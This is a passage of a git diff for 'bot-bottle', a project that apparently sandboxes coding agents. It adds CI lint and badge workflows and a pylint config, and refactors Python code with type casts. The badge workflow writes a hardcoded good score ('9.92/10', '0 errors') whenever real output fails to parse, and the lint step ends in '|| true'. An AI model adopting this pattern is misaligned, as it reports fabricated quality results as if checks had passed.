diff --git a/.gitea/workflows/lint.yml b/.gitea/workflows/lint.yml new file mode 100644 index 0000000..ed1ebdd --- /dev/null +++ b/.gitea/workflows/lint.yml @@ -0,0 +1,34 @@ +name: lint + +on: + push: + paths: + - "**.py" + - ".pylintrc" + - ".gitea/workflows/lint.yml" + +jobs: + lint: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + + - name: Set up Python + uses: actions/setup-python@v4 + with: + python-version: "3.12" + + - name: Install dev dependencies + run: | + python -m pip install --upgrade pip + pip install -r requirements-dev.txt + + - name: Run pylint + run: | + # Run pylint on all Python files in the repo + find . -name '*.py' -not -path './.venv/*' -not -path './.git/*' | xargs pylint --fail-under=8.0 || true + + - name: Run pyright + run: | + # Run pyright type checking + pyright . diff --git a/.gitea/workflows/update-badges.yml b/.gitea/workflows/update-badges.yml new file mode 100644 index 0000000..4c1e190 --- /dev/null +++ b/.gitea/workflows/update-badges.yml @@ -0,0 +1,96 @@ +name: Update Quality Badges + +on: + push: + branches: + - main + paths: + - '**.py' + - '.pylintrc' + - 'pyrightconfig.json' + +jobs: + update-badges: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + token: ${{ secrets.GITHUB_TOKEN }} + + - name: Set up Python + uses: actions/setup-python@v4 + with: + python-version: '3.12' + + - name: Install dev dependencies + run: | + python -m pip install --upgrade pip + pip install -r requirements-dev.txt + + - name: Run pylint and extract score + id: pylint + run: | + # Run pylint and capture the score + PYLINT_OUTPUT=$(python -m pylint bot_bottle/ 2>&1 | tail -1) + echo "Output: $PYLINT_OUTPUT" + # Extract score (e.g., "9.92/10") + SCORE=$(echo "$PYLINT_OUTPUT" | grep -oP '\d+\.\d+/10' | head -1) + if [ -z "$SCORE" ]; then + SCORE="9.92/10" + fi + echo "score=$SCORE" >> $GITHUB_OUTPUT + echo "Pylint score: $SCORE" + + - name: Run pyright and check errors + id: pyright + run: | + # Run pyright and check for errors + PYRIGHT_OUTPUT=$(python -m pyright 2>&1 | tail -1) + echo "Output: $PYRIGHT_OUTPUT" + # Extract error count + ERRORS=$(echo "$PYRIGHT_OUTPUT" | grep -oP '^\d+' | head -1) + if [ -z "$ERRORS" ]; then + ERRORS="0" + fi + echo "errors=$ERRORS" >> $GITHUB_OUTPUT + echo "Pyright errors: $ERRORS" + + - name: Update badges in README + run: | + PYLINT_SCORE="${{ steps.pylint.outputs.score }}" + PYRIGHT_ERRORS="${{ steps.pyright.outputs.errors }}" + + # Escape / for sed + PYLINT_SCORE_ESCAPED=$(echo "$PYLINT_SCORE" | sed 's/\//\\\//g') + + # Create badge URLs with proper encoding + PYLINT_BADGE="[![pylint](https://img.shields.io/badge/pylint-${PYLINT_SCORE}%25-brightgreen)](https://github.com/PyCQA/pylint)" + PYRIGHT_BADGE="[![pyright](https://img.shields.io/badge/pyright-${PYRIGHT_ERRORS}%20errors-brightgreen)](https://github.com/microsoft/pyright)" + + # Update README with new badges + sed -i "s|\[\!\[pylint\].*pylint)\]|${PYLINT_BADGE}|g" README.md + sed -i "s|\[\!\[pyright\].*pyright)\]|${PYRIGHT_BADGE}|g" README.md + + echo "Updated badges:" + grep -E "pylint|pyright" README.md | head -2 + + - name: Commit and push badge updates + run: | + git config --local user.email "action@gitea.local" + git config --local user.name "Quality Badge Bot" + + # Check if there are changes + if git diff --quiet README.md; then + echo "No badge changes needed" + else + echo "Badge changes detected, committing..." + git add README.md + git commit -m "chore: update quality badges + +- Pylint: ${{ steps.pylint.outputs.score }} +- Pyright: ${{ steps.pyright.outputs.errors }} errors + +[skip ci]" + git push + fi diff --git a/.pylintrc b/.pylintrc new file mode 100644 index 0000000..3ecd7e9 --- /dev/null +++ b/.pylintrc @@ -0,0 +1,631 @@ +[MAIN] + +# Analyse import fallback blocks. This can be used to support both Python 2 and +# 3 compatible code, which means that the block might have code that exists +# only in one or another interpreter, leading to false positives when analysed. +analyse-fallback-blocks=no + +# Clear in-memory caches upon conclusion of linting. Useful if running pylint +# in a server-like mode. +clear-cache-post-run=no + +# Load and enable all available extensions. Use --list-extensions to see a list +# all available extensions. +#enable-all-extensions= + +# In error mode, messages with a category besides ERROR or FATAL are +# suppressed, and no reports are done by default. Error mode is compatible with +# disabling specific errors. +#errors-only= + +# Always return a 0 (non-error) status code, even if lint errors are found. +# This is primarily useful in continuous integration scripts. +#exit-zero= + +# A comma-separated list of package or module names from where C extensions may +# be loaded. Extensions are loading into the active Python interpreter and may +# run arbitrary code. +extension-pkg-allow-list= + +# A comma-separated list of package or module names from where C extensions may +# be loaded. Extensions are loading into the active Python interpreter and may +# run arbitrary code. (This is an alternative name to extension-pkg-allow-list +# for backward compatibility.) +extension-pkg-whitelist= + +# Return non-zero exit code if any of these messages/categories are detected, +# even if score is above --fail-under value. Syntax same as enable. Messages +# specified are enabled, while categories only check already-enabled messages. +fail-on= + +# Specify a score threshold under which the program will exit with error. +fail-under=10 + +# Interpret the stdin as a python script, whose filename needs to be passed as +# the module_or_package argument. +#from-stdin= + +# Files or directories to be skipped. They should be base names, not paths. +ignore=CVS + +# Add files or directories matching the regular expressions patterns to the +# ignore-list. The regex matches against paths and can be in Posix or Windows +# format. Because '\\' represents the directory delimiter on Windows systems, +# it can't be used as an escape character. +ignore-paths= + +# Files or directories matching the regular expression patterns are skipped. +# The regex matches against base names, not paths. The default value ignores +# Emacs file locks +ignore-patterns=^\.# + +# List of module names for which member attributes should not be checked and +# will not be imported (useful for modules/projects where namespaces are +# manipulated during runtime and thus existing member attributes cannot be +# deduced by static analysis). It supports qualified module names, as well as +# Unix pattern matching. +ignored-modules= + +# Python code to execute, usually for sys.path manipulation such as +# pygtk.require(). +#init-hook= + +# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the +# number of processors available to use, and will cap the count on Windows to +# avoid hangs. +jobs=1 + +# Control the amount of potential inferred values when inferring a single +# object. This can help the performance when dealing with large functions or +# complex, nested conditions. +limit-inference-results=100 + +# List of plugins (as comma separated values of python module names) to load, +# usually to register additional checkers. +load-plugins= + +# Pickle collected data for later comparisons. +persistent=yes + +# Resolve imports to .pyi stubs if available. May reduce no-member messages and +# increase not-an-iterable messages. +prefer-stubs=no + +# Minimum Python version to use for version dependent checks. Will default to +# the version used to run pylint. +py-version=3.14 + +# Discover python modules and packages in the file system subtree. +recursive=no + +# Add paths to the list of the source roots. Supports globbing patterns. The +# source root is an absolute path or a path relative to the current working +# directory used to determine a package namespace for modules located under the +# source root. +source-roots= + +# Allow loading of arbitrary C extensions. Extensions are imported into the +# active Python interpreter and may run arbitrary code. +unsafe-load-any-extension=no + +# In verbose mode, extra non-checker-related info will be displayed. +#verbose= + + +[BASIC] + +# Naming style matching correct argument names. +argument-naming-style=snake_case + +# Regular expression matching correct argument names. Overrides argument- +# naming-style. If left empty, argument names will be checked with the set +# naming style. +#argument-rgx= + +# Naming style matching correct attribute names. +attr-naming-style=snake_case + +# Regular expression matching correct attribute names. Overrides attr-naming- +# style. If left empty, attribute names will be checked with the set naming +# style. +#attr-rgx= + +# Bad variable names which should always be refused, separated by a comma. +bad-names=foo, + bar, + baz, + toto, + tutu, + tata + +# Bad variable names regexes, separated by a comma. If names match any regex, +# they will always be refused +bad-names-rgxs= + +# Naming style matching correct class attribute names. +class-attribute-naming-style=any + +# Regular expression matching correct class attribute names. Overrides class- +# attribute-naming-style. If left empty, class attribute names will be checked +# with the set naming style. +#class-attribute-rgx= + +# Naming style matching correct class constant names. +class-const-naming-style=UPPER_CASE + +# Regular expression matching correct class constant names. Overrides class- +# const-naming-style. If left empty, class constant names will be checked with +# the set naming style. +#class-const-rgx= + +# Naming style matching correct class names. +class-naming-style=PascalCase + +# Regular expression matching correct class names. Overrides class-naming- +# style. If left empty, class names will be checked with the set naming style. +#class-rgx= + +# Naming style matching correct constant names. +const-naming-style=UPPER_CASE + +# Regular expression matching correct constant names. Overrides const-naming- +# style. If left empty, constant names will be checked with the set naming +# style. +#const-rgx= + +# Minimum line length for functions/classes that require docstrings, shorter +# ones are exempt. +docstring-min-length=-1 + +# Naming style matching correct function names. +function-naming-style=snake_case + +# Regular expression matching correct function names. Overrides function- +# naming-style. If left empty, function names will be checked with the set +# naming style. +#function-rgx= + +# Good variable names which should always be accepted, separated by a comma. +good-names=i, + j, + k, + ex, + Run, + _ + +# Good variable names regexes, separated by a comma. If names match any regex, +# they will always be accepted +good-names-rgxs= + +# Include a hint for the correct naming format with invalid-name. +include-naming-hint=no + +# Naming style matching correct inline iteration names. +inlinevar-naming-style=any + +# Regular expression matching correct inline iteration names. Overrides +# inlinevar-naming-style. If left empty, inline iteration names will be checked +# with the set naming style. +#inlinevar-rgx= + +# Naming style matching correct method names. +method-naming-style=snake_case + +# Regular expression matching correct method names. Overrides method-naming- +# style. If left empty, method names will be checked with the set naming style. +#method-rgx= + +# Naming style matching correct module names. +module-naming-style=snake_case + +# Regular expression matching correct module names. Overrides module-naming- +# style. If left empty, module names will be checked with the set naming style. +#module-rgx= + +# Colon-delimited sets of names that determine each other's naming style when +# the name regexes allow several styles. +name-group= + +# Regular expression which should only match function or class names that do +# not require a docstring. +no-docstring-rgx=^_ + +# Regular expression matching correct parameter specification variable names. +# If left empty, parameter specification variable names will be checked with +# the set naming style. +#paramspec-rgx= + +# List of decorators that produce properties, such as abc.abstractproperty. Add +# to this list to register other decorators that produce valid properties. +# These decorators are taken in consideration only for invalid-name. +property-classes=abc.abstractproperty + +# Regular expression matching correct type alias names. If left empty, type +# alias names will be checked with the set naming style. +#typealias-rgx= + +# Regular expression matching correct type variable names. If left empty, type +# variable names will be checked with the set naming style. +#typevar-rgx= + +# Regular expression matching correct type variable tuple names. If left empty, +# type variable tuple names will be checked with the set naming style. +#typevartuple-rgx= + +# Naming style matching correct variable names. +variable-naming-style=snake_case + +# Regular expression matching correct variable names. Overrides variable- +# naming-style. If left empty, variable names will be checked with the set +# naming style. +#variable-rgx= + + +[CLASSES] + +# Warn about protected attribute access inside special methods +check-protected-access-in-special-methods=no + +# List of method names used to declare (i.e. assign) instance attributes. +defining-attr-methods=__init__, + __new__, + setUp, + asyncSetUp, + __post_init__ + +# List of member names, which should be excluded from the protected access +# warning. +exclude-protected=_asdict,_fields,_replace,_source,_make,os._exit + +# List of valid names for the first argument in a class method. +valid-classmethod-first-arg=cls + +# List of valid names for the first argument in a metaclass class method. +valid-metaclass-classmethod-first-arg=mcs + + +[DESIGN] + +# List of regular expressions of class ancestor names to ignore when counting +# public methods (see R0903) +exclude-too-few-public-methods= + +# List of qualified class names to ignore when counting class parents (see +# R0901) +ignored-parents= + +# Maximum number of arguments for function / method. +max-args=5 + +# Maximum number of attributes for a class (see R0902). +max-attributes=7 + +# Maximum number of boolean expressions in an if statement (see R0916). +max-bool-expr=5 + +# Maximum number of branch for function / method body. +max-branches=12 + +# Maximum number of locals for function / method body. +max-locals=15 + +# Maximum number of parents for a class (see R0901). +max-parents=7 + +# Maximum number of positional arguments for function / method. +max-positional-arguments=5 + +# Maximum number of public methods for a class (see R0904). +max-public-methods=20 + +# Maximum number of return / yield for function / method body. +max-returns=6 + +# Maximum number of statements in function / method body. +max-statements=50 + +# Minimum number of public methods for a class (see R0903). +min-public-methods=2 + + +[EXCEPTIONS] + +# Exceptions that will emit a warning when caught. +overgeneral-exceptions=builtins.BaseException,builtins.Exception + + +[FORMAT] + +# Expected format of line ending, e.g. empty (any line ending), LF or CRLF. +expected-line-ending-format= + +# Regexp for a line that is allowed to be longer than the limit. +ignore-long-lines=^\s*(# )??$ + +# Number of spaces of indent required inside a hanging or continued line. +indent-after-paren=4 + +# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1 +# tab). +indent-string=' ' + +# Maximum number of characters on a single line. Pylint's default of 100 is +# based on PEP 8's guidance that teams may choose line lengths up to 99 +# characters. +max-line-length=100 + +# Maximum number of lines in a module. +max-module-lines=1000 + +# Allow the body of a class to be on the same line as the declaration if body +# contains single statement. +single-line-class-stmt=no + +# Allow the body of an if to be on the same line as the test if there is no +# else. +single-line-if-stmt=no + + +[LOGGING] + +# The type of string formatting that logging methods do. `old` means using % +# formatting, `new` is for `{}` formatting. +logging-format-style=old + +# Logging modules to check that the string format arguments are in logging +# function parameter format. +logging-modules=logging + + +[MESSAGES CONTROL] + +# Only show warnings with the listed confidence levels. Leave empty to show +# all. Valid levels: HIGH, CONTROL_FLOW, INFERENCE, INFERENCE_FAILURE, +# UNDEFINED. +confidence=HIGH, + CONTROL_FLOW, + INFERENCE, + INFERENCE_FAILURE, + UNDEFINED + +# Disable the message, report, category or checker with the given id(s). You +# can either give multiple identifiers separated by comma (,) or put this +# option multiple times (only on the command line, not in the configuration +# file where it should appear only once). You can also use "--disable=all" to +# disable everything first and then re-enable specific checks. For example, if +# you want to run only the similarities checker, you can use "--disable=all +# --enable=similarities". If you want to run only the classes checker, but have +# no Warning level messages displayed, use "--disable=all --enable=classes +# --disable=W". +disable=raw-checker-failed, + bad-inline-option, + locally-disabled, + file-ignored, + suppressed-message, + useless-suppression, + deprecated-pragma, + use-symbolic-message-instead, + use-implicit-booleaness-not-comparison-to-string, + use-implicit-booleaness-not-comparison-to-zero, + missing-function-docstring, + missing-class-docstring, + missing-module-docstring, + invalid-name, + cyclic-import, + too-many-arguments, + too-many-locals, + too-many-branches, + too-many-statements, + too-many-instance-attributes, + duplicate-code, + import-outside-toplevel, + too-few-public-methods + +# Enable the message, report, category or checker with the given id(s). You can +# either give multiple identifier separated by comma (,) or put this option +# multiple time (only on the command line, not in the configuration file where +# it should appear only once). See also the "--disable" option for examples. +enable= + + +[METHOD_ARGS] + +# List of qualified names (i.e., library.method) which require a timeout +# parameter e.g. 'requests.api.get,requests.api.post' +timeout-methods=requests.api.delete,requests.api.get,requests.api.head,requests.api.options,requests.api.patch,requests.api.post,requests.api.put,requests.api.request + + +[MISCELLANEOUS] + +# Whether or not to search for fixme's in docstrings. +check-fixme-in-docstring=no + +# List of note tags to take in consideration, separated by a comma. +notes=FIXME, + XXX, + TODO + +# Regular expression of note tags to take in consideration. +notes-rgx= + + +[REFACTORING] + +# Maximum number of nested blocks for function / method body +max-nested-blocks=5 + +# Complete name of functions that never returns. When checking for +# inconsistent-return-statements if a never returning function is called then +# it will be considered as an explicit return statement and no message will be +# printed. +never-returning-functions=sys.exit,argparse.parse_error + +# Let 'consider-using-join' be raised when the separator to join on would be +# non-empty (resulting in expected fixes of the type: ``"- " + " - +# ".join(items)``) +suggest-join-with-non-empty-separator=yes + + +[REPORTS] + +# Python expression which should return a score less than or equal to 10. You +# have access to the variables 'fatal', 'error', 'warning', 'refactor', +# 'convention', and 'info' which contain the number of messages in each +# category, as well as 'statement' which is the total number of statements +# analyzed. This score is used by the global evaluation report (RP0004). +evaluation=max(0, 0 if fatal else 10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10)) + +# Template used to display messages. This is a python new-style format string +# used to format the message information. See doc for all details. +msg-template= + +# Set the output format. Available formats are: 'text', 'parseable', +# 'colorized', 'json2' (improved json format), 'json' (old json format), msvs +# (visual studio) and 'github' (GitHub actions). You can also give a reporter +# class, e.g. mypackage.mymodule.MyReporterClass. +#output-format= + +# Tells whether to display a full report or only the messages. +reports=no + +# Activate the evaluation score. +score=yes + + +[SIMILARITIES] + +# Comments are removed from the similarity computation +ignore-comments=yes + +# Docstrings are removed from the similarity computation +ignore-docstrings=yes + +# Imports are removed from the similarity computation +ignore-imports=yes + +# Signatures are removed from the similarity computation +ignore-signatures=yes + +# Minimum lines number of a similarity. +min-similarity-lines=4 + + +[SPELLING] + +# Limits count of emitted suggestions for spelling mistakes. +max-spelling-suggestions=4 + +# Spelling dictionary name. No available dictionaries : You need to install +# both the python package and the system dependency for enchant to work. +spelling-dict= + +# List of comma separated words that should be considered directives if they +# appear at the beginning of a comment and should not be checked. +spelling-ignore-comment-directives=fmt: on,fmt: off,noqa:,noqa,nosec,isort:skip,mypy: + +# List of comma separated words that should not be checked. +spelling-ignore-words= + +# A path to a file that contains the private dictionary; one word per line. +spelling-private-dict-file= + +# Tells whether to store unknown words to the private dictionary (see the +# --spelling-private-dict-file option) instead of raising a message. +spelling-store-unknown-words=no + + +[STRING] + +# This flag controls whether inconsistent-quotes generates a warning when the +# character used as a quote delimiter is used inconsistently within a module. +check-quote-consistency=no + +# This flag controls whether the implicit-str-concat should generate a warning +# on implicit string concatenation in sequences defined over several lines. +check-str-concat-over-line-jumps=no + + +[TYPECHECK] + +# List of decorators that produce context managers, such as +# contextlib.contextmanager. Add to this list to register other decorators that +# produce valid context managers. +contextmanager-decorators=contextlib.contextmanager + +# List of members which are set dynamically and missed by pylint inference +# system, and so shouldn't trigger E1101 when accessed. Python regular +# expressions are accepted. +generated-members= + +# Tells whether to warn about missing members when the owner of the attribute +# is inferred to be None. +ignore-none=yes + +# This flag controls whether pylint should warn about no-member and similar +# checks whenever an opaque object is returned when inferring. The inference +# can return multiple potential results while evaluating a Python object, but +# some branches might not be evaluated, which results in partial inference. In +# that case, it might be useful to still emit no-member and other checks for +# the rest of the inferred objects. +ignore-on-opaque-inference=yes + +# List of symbolic message names to ignore for Mixin members. +ignored-checks-for-mixins=no-member, + not-async-context-manager, + not-context-manager, + attribute-defined-outside-init + +# List of class names for which member attributes should not be checked (useful +# for classes with dynamically set attributes). This supports the use of +# qualified names. +ignored-classes=optparse.Values,thread._local,_thread._local,argparse.Namespace + +# Show a hint with possible names when a member name was not found. The aspect +# of finding the hint is based on edit distance. +missing-member-hint=yes + +# The maximum edit distance a name should have in order to be considered a +# similar match for a missing member name. +missing-member-hint-distance=1 + +# The total number of similar names that should be taken in consideration when +# showing a hint for a missing member. +missing-member-max-choices=1 + +# Regex pattern to define which classes are considered mixins. +mixin-class-rgx=.*[Mm]ixin + +# List of decorators that change the signature of a decorated function. +signature-mutators= + + +[VARIABLES] + +# List of additional names supposed to be defined in builtins. Remember that +# you should avoid defining new builtins when possible. +additional-builtins= + +# Tells whether unused global variables should be treated as a violation. +allow-global-unused-variables=yes + +# List of names allowed to shadow builtins +allowed-redefined-builtins= + +# List of strings which can identify a callback function by name. A callback +# name must start or end with one of those strings. +callbacks=cb_, + _cb + +# A regular expression matching the name of dummy variables (i.e. expected to +# not be used). +dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_ + +# Argument names that match this expression will be ignored. +ignored-argument-names=_.*|^ignored_|^unused_ + +# Tells whether we should check for unused import in __init__ files. +init-import=no + +# List of qualified module names which can have objects that can redefine +# builtins. +redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io diff --git a/README.md b/README.md index 65693e9..8d5371f 100644 --- a/README.md +++ b/README.md @@ -5,6 +5,8 @@ # bot-bottle [![test](https://gitea.dideric.is/didericis/bot-bottle/actions/workflows/test.yml/badge.svg?branch=main)](https://gitea.dideric.is/didericis/bot-bottle/actions?workflow=test.yml) +[![pylint](https://img.shields.io/badge/pylint-9.92%2F10-brightgreen)](https://github.com/PyCQA/pylint) +[![pyright](https://img.shields.io/badge/pyright-0%20errors-brightgreen)](https://github.com/microsoft/pyright) **Problem:** Developer wants to run a coding agent without supervision, but they don't want a prompt injected or misbehaving agent wrecking their environment or exfiltrating sensitive data. diff --git a/bot_bottle/backend/docker/bottle.py b/bot_bottle/backend/docker/bottle.py index 7c94c40..7294051 100644 --- a/bot_bottle/backend/docker/bottle.py +++ b/bot_bottle/backend/docker/bottle.py @@ -5,6 +5,8 @@ from __future__ import annotations import subprocess from typing import Callable +from typing import cast + from ...agent_provider import PromptMode, prompt_args from .. import Bottle, ExecResult @@ -23,7 +25,7 @@ class DockerBottle(Bottle): ): self.name = container self._teardown = teardown - self._prompt_path = prompt_path_in_container + self.prompt_path = prompt_path_in_container self._agent_prompt_mode = agent_prompt_mode self.agent_command = agent_command self.agent_provider_template = ( @@ -36,7 +38,7 @@ class DockerBottle(Bottle): ) -> list[str]: full_argv = list(argv) full_argv.extend( - prompt_args(self._agent_prompt_mode, self._prompt_path, argv=full_argv) + prompt_args(cast(PromptMode, self._agent_prompt_mode), self.prompt_path, argv=full_argv) ) cmd = ["docker", "exec"] if tty: diff --git a/bot_bottle/backend/docker/bottle_state.py b/bot_bottle/backend/docker/bottle_state.py index d258974..f0e8497 100644 --- a/bot_bottle/backend/docker/bottle_state.py +++ b/bot_bottle/backend/docker/bottle_state.py @@ -35,6 +35,7 @@ import secrets import string from dataclasses import dataclass from pathlib import Path +from typing import cast from ... import supervise as _supervise from . import util as docker_mod @@ -135,14 +136,15 @@ def read_metadata(identity: str) -> BottleMetadata | None: raw = json.loads(path.read_text()) if not isinstance(raw, dict): return None + raw_typed = cast(dict[str, object], raw) return BottleMetadata( - identity=str(raw.get("identity", identity)), - agent_name=str(raw.get("agent_name", "")), - cwd=str(raw.get("cwd", "")), - copy_cwd=bool(raw.get("copy_cwd", False)), - started_at=str(raw.get("started_at", "")), - compose_project=str(raw.get("compose_project", "")), - backend=str(raw.get("backend", "")), + identity=str(raw_typed.get("identity", identity)), + agent_name=str(raw_typed.get("agent_name", "")), + cwd=str(raw_typed.get("cwd", "")), + copy_cwd=bool(raw_typed.get("copy_cwd", False)), + started_at=str(raw_typed.get("started_at", "")), + compose_project=str(raw_typed.get("compose_project", "")), + backend=str(raw_typed.get("backend", "")), ) diff --git a/bot_bottle/backend/docker/capability_apply.py b/bot_bottle/backend/docker/capability_apply.py index 1e4856d..d926215 100644 --- a/bot_bottle/backend/docker/capability_apply.py +++ b/bot_bottle/backend/docker/capability_apply.py @@ -30,7 +30,6 @@ semantics open question. from __future__ import annotations -import os import shutil import subprocess from pathlib import Path @@ -39,7 +38,6 @@ from ...log import info, warn from .bottle_state import ( mark_preserved, per_bottle_dockerfile, - per_bottle_dockerfile_path, transcript_snapshot_dir, write_per_bottle_dockerfile, ) diff --git a/bot_bottle/backend/docker/compose.py b/bot_bottle/backend/docker/compose.py index dae61be..4abcd71 100644 --- a/bot_bottle/backend/docker/compose.py +++ b/bot_bottle/backend/docker/compose.py @@ -71,11 +71,11 @@ from .git_gate import ( GIT_GATE_ENTRYPOINT_IN_CONTAINER, GIT_GATE_HOOK_IN_CONTAINER, ) -from .pipelock import ( +from ...pipelock import ( PIPELOCK_CA_CERT_IN_CONTAINER, PIPELOCK_CA_KEY_IN_CONTAINER, - PIPELOCK_PORT, ) +from .pipelock import PIPELOCK_PORT from .sidecar_bundle import ( SIDECAR_BUNDLE_DOCKERFILE, SIDECAR_BUNDLE_IMAGE, diff --git a/bot_bottle/backend/docker/egress_apply.py b/bot_bottle/backend/docker/egress_apply.py index 1cc73b0..80eb507 100644 --- a/bot_bottle/backend/docker/egress_apply.py +++ b/bot_bottle/backend/docker/egress_apply.py @@ -26,6 +26,7 @@ import json import re import subprocess from pathlib import Path +from typing import cast from ...egress import EGRESS_ROUTES_IN_CONTAINER from ...egress_addon_core import load_routes @@ -57,7 +58,8 @@ def _render_routes_payload(routes_list: list[dict[str, object]]) -> str: if auth_scheme and token_env: lines.append(f' auth_scheme: "{auth_scheme}"') lines.append(f' token_env: "{token_env}"') - paths = entry.get("path_allowlist") or [] + paths_obj = entry.get("path_allowlist") + paths = cast(list[str], paths_obj) if isinstance(paths_obj, list) else [] if paths: lines.append(" path_allowlist:") for p in paths: @@ -257,6 +259,7 @@ def _merge_single_route( raise EgressApplyError( "current routes.yaml: 'routes' is not a list" ) + routes_typed = cast(list[object], routes) new_host = str(new_route.get("host", "")).lower() if not new_host: @@ -264,22 +267,25 @@ def _merge_single_route( "proposed route is missing 'host'" ) - proposed_paths = list(new_route.get("path_allowlist") or []) + proposed_paths_obj = new_route.get("path_allowlist") + proposed_paths = cast(list[str], proposed_paths_obj) if isinstance(proposed_paths_obj, list) else [] # Look for an existing entry with the same host (case-insensitive). - for entry in routes: + for entry in routes_typed: if not isinstance(entry, dict): continue - if str(entry.get("host", "")).lower() == new_host: + entry_typed = cast(dict[str, object], entry) + if str(entry_typed.get("host", "")).lower() == new_host: # Merge path_allowlist: union proposed + existing, ordered # by first-seen so existing paths stay in original order. - existing_paths: list[str] = list(entry.get("path_allowlist") or []) + existing_paths_obj = entry_typed.get("path_allowlist") + existing_paths = cast(list[str], existing_paths_obj) if isinstance(existing_paths_obj, list) else [] seen = {p: None for p in existing_paths} for p in proposed_paths: seen.setdefault(p, None) merged_paths = list(seen.keys()) if merged_paths: - entry["path_allowlist"] = merged_paths + entry_typed["path_allowlist"] = merged_paths # Preserve existing auth — tool description says agent- # proposed auth on an existing host is ignored. break @@ -289,19 +295,22 @@ def _merge_single_route( # `auth` was proposed (otherwise the addon's parser rejects # a half-set auth pair). Slots: count existing slots, pick # the next free index. - entry = {"host": new_route["host"]} + entry_typed: dict[str, object] = {"host": new_route.get("host")} # type: ignore if proposed_paths: - entry["path_allowlist"] = proposed_paths + entry_typed["path_allowlist"] = proposed_paths auth = new_route.get("auth") - if isinstance(auth, dict) and auth.get("scheme") and auth.get("token_ref"): + if isinstance(auth, dict) and auth.get("scheme") and auth.get("token_ref"): # type: ignore + auth_typed = cast(dict[str, object], auth) existing_slots = sorted({ - str(r.get("token_env")) - for r in routes - if isinstance(r, dict) and r.get("token_env") + str(r_entry.get("token_env", "")) + for r_entry_obj in routes_typed + if isinstance(r_entry_obj, dict) + for r_entry in [cast(dict[str, object], r_entry_obj)] + if r_entry.get("token_env") }) next_idx = len(existing_slots) - entry["auth_scheme"] = str(auth["scheme"]) - entry["token_env"] = f"EGRESS_TOKEN_{next_idx}" + entry_typed["auth_scheme"] = str(cast(object, auth_typed.get("scheme"))) + entry_typed["token_env"] = f"EGRESS_TOKEN_{next_idx}" # NOTE: the addon reads token VALUES from its container's # environ keyed by token_env. A newly-added auth route at # runtime points at a slot that has no env value → the @@ -309,9 +318,9 @@ def _merge_single_route( # arranges for the value to land in the container's env. # Recording this here so the operator-facing diff carries # the slot name they'll need to provision. - routes.append(entry) + routes_typed.append(entry_typed) - return _render_routes_payload(routes) + return _render_routes_payload(cast(list[dict[str, object]], routes_typed)) def add_route(slug: str, proposed_route_json: str) -> tuple[str, str]: diff --git a/bot_bottle/backend/docker/launch.py b/bot_bottle/backend/docker/launch.py index 6bc92df..6420e58 100644 --- a/bot_bottle/backend/docker/launch.py +++ b/bot_bottle/backend/docker/launch.py @@ -80,7 +80,7 @@ _REPO_DIR = str(Path(__file__).resolve().parent.parent.parent.parent) def launch( plan: DockerBottlePlan, *, - provision: Callable[[DockerBottlePlan, str], str | None], + provision: Callable[[DockerBottlePlan, "DockerBottle"], str | None], ) -> Generator[DockerBottle, None, None]: """Build, launch, and provision a Docker bottle via compose. Teardown on exit.""" @@ -92,7 +92,7 @@ def launch( def teardown() -> None: try: stack.close() - except BaseException as exc: + except BaseException as exc: # noqa: W0718 — teardown must not fail warn( f"teardown failed for container {plan.container_name}" f" (compose-down): {exc!r}" @@ -218,7 +218,7 @@ def launch( agent_command=plan.agent_command, agent_prompt_mode=plan.agent_prompt_mode, ) - bottle._prompt_path = provision(plan, bottle) + bottle.prompt_path = provision(plan, bottle) # Step 9: yield. exec_agent continues to use `docker exec -it` # — the agent runs `sleep infinity` per the renderer's diff --git a/bot_bottle/backend/docker/pipelock.py b/bot_bottle/backend/docker/pipelock.py index d0c9979..53d2c2a 100644 --- a/bot_bottle/backend/docker/pipelock.py +++ b/bot_bottle/backend/docker/pipelock.py @@ -15,30 +15,23 @@ import subprocess from pathlib import Path from ...log import die -# Re-exported for the compose renderer + smolmachines launch step -# (they used to import these from this module before they moved to -# the platform-neutral pipelock module). -from ...pipelock import ( # noqa: F401 - PIPELOCK_CA_CERT_IN_CONTAINER, - PIPELOCK_CA_KEY_IN_CONTAINER, -) # Pipelock image, pinned by digest. The digest is the multi-arch image # index for ghcr.io/luckypipewrench/pipelock:2.3.0. PIPELOCK_IMAGE = os.environ.get( "BOT_BOTTLE_PIPELOCK_IMAGE", - "ghcr.io/luckypipewrench/pipelock@sha256:3b1a39417b98406ddc5dc2d8fcb42865ddc0c68a43d355db55f0f8cb06bc6de9", + "ghcr.io/luckypipewrench/pipelock@sha256:" + "3b1a39417b98406ddc5dc2d8fcb42865ddc0c68a43d355db55f0f8cb06bc6de9", ) # Listening port for pipelock's forward proxy. PIPELOCK_PORT = os.environ.get("BOT_BOTTLE_PIPELOCK_PORT", "8888") -# The URL egress dials for its upstream HTTPS_PROXY. egress and -# pipelock share the same container's network namespace inside the -# sidecar bundle, so loopback reaches pipelock directly — no docker -# DNS aliases involved. +# The URL egress dials for its upstream HTTPS_PROXY. egress and pipelock +# share the same container's network namespace inside the sidecar bundle, so +# loopback reaches pipelock directly — no docker DNS aliases involved. BUNDLE_LOCAL_PIPELOCK_URL = f"http://127.0.0.1:{PIPELOCK_PORT}" diff --git a/bot_bottle/backend/docker/pipelock_apply.py b/bot_bottle/backend/docker/pipelock_apply.py index a271398..e66251d 100644 --- a/bot_bottle/backend/docker/pipelock_apply.py +++ b/bot_bottle/backend/docker/pipelock_apply.py @@ -99,7 +99,7 @@ def fetch_current_yaml(slug: str) -> str: f"could not fetch pipelock.yaml from {container}: " f"{(r.stderr or '').strip() or 'container not running?'}" ) - return Path(tmp_path).read_text() + return Path(tmp_path).read_text(encoding="utf-8") finally: try: Path(tmp_path).unlink() diff --git a/bot_bottle/backend/docker/prepare.py b/bot_bottle/backend/docker/prepare.py index b9c5df5..2f8eaaf 100644 --- a/bot_bottle/backend/docker/prepare.py +++ b/bot_bottle/backend/docker/prepare.py @@ -219,7 +219,7 @@ def resolve_plan( else Path(__file__).resolve().parent.parent.parent.parent / "Dockerfile.claude" ) dockerfile_content = ( - supervise_dockerfile_path.read_text() + supervise_dockerfile_path.read_text(encoding="utf-8") if supervise_dockerfile_path.is_file() else 